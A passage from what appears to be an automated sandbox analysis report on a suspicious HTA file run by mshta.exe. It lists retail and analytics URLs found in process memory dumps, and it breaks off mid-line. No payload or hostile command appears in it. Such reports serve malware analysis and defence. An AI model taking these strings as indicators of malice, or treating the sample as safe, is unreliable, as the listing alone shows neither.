00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487130181.000000000AAFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/home?chave=prfm_mn_ss_22_a
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25482972272.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/seguro-celular-roubo-furto?chave=pfm_hm_tt_1_0_seguro
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/termos
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488441042.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466221929.000000000AC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/termos-e-condicoes
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379435044.000000000B70A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/termos-e-condicoes?chave=dk_hm_ft_00_06_termos
Source: mshta.exe, 00000000.00000003.25396464078.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432134093.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25437986277.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485163864.00000000095B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377202169.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398590694.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25482972272.0000000006EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/top-categorias?chave=pm_hm_mn_acom_eletroportateis_topcategori
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/top-categorias?chave=pm_hm_mn_acom_informatica_topcategoriashw
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402274224.000000000ABFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410331977.000000000ABFC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402044364.000000000ABF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411110659.000000000AADA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488051820.000000000ABFC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/vale-presente?chave=brd_hm_mn_0_bottom_valepresente17
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484145246.0000000009467000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462689449.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488630378.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.0000000006766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460802201.0000000009466000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/lojas-proximas?chave=brd_hm_tt_0_0_recebahoje
Source: mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460571625.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463225262.000000000957C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387679114.000000000ABC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466141832.000000000ABC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401588246.000000000ABC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487918630.000000000ABC9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444023676.000000000ABC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317721237.000000000678A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/lojista/americanas-33014556000196/c/brinquedos?origem=blancalojista&ch
Source: mshta.exe, 00000000.00000003.25444696283.000000000AAE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487035361.000000000AAE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403359290.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488441042.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466221929.000000000AC65000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/mapa-do-site
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484783384.0000000009508000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411529883.0000000009507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/marca/chandon)0
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490021991.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462814221.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383830981.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanasadvertising.com?utm_source=site_marcas_americanas&utm_medium=botao_footer&utm_
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490021991.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462689449.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462814221.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383830981.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488630378.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402328770.000000000AC1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403501791.000000000AC22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanasmarketplace.com.br/?epar=bo_tx_st_am_gw_footer_americanas&utm_source=americana
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487832586.000000000ABBB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.0000000009525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25396803939.0000000009525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484909575.0000000009538000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409811303.0000000009537000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.directlog.com.br/
Source: mshta.exe, 00000000.00000003.25465970538.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463049047.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466101017.0000000003074000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479770165.0000000003075000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400515549.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384835381.0000000003018000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: mshta.exe, 00000000.00000003.25400515549.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25445371726.00000000067F5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386380678.000000000307C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399878363.00000000030B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463049047.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378502221.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479677159.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466400085.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479810428.000000000307D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478339729.000000000307D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PDFX6WC
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PDFX6WC-qr
Source: mshta.exe, 00000000.00000003.25400515549.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463049047.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479677159.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466400085.0000000003060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PDFX6WC7
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PDFX6WCPq
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PDFX6WCi
Source: mshta.exe, 00000000.00000003.25400515549.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.0000000003060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PDFX6WCj
Source: mshta.exe, 00000000.00000003.25392143865.000000000A9B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443475613.000000000A9B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387679114.000000000ABC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 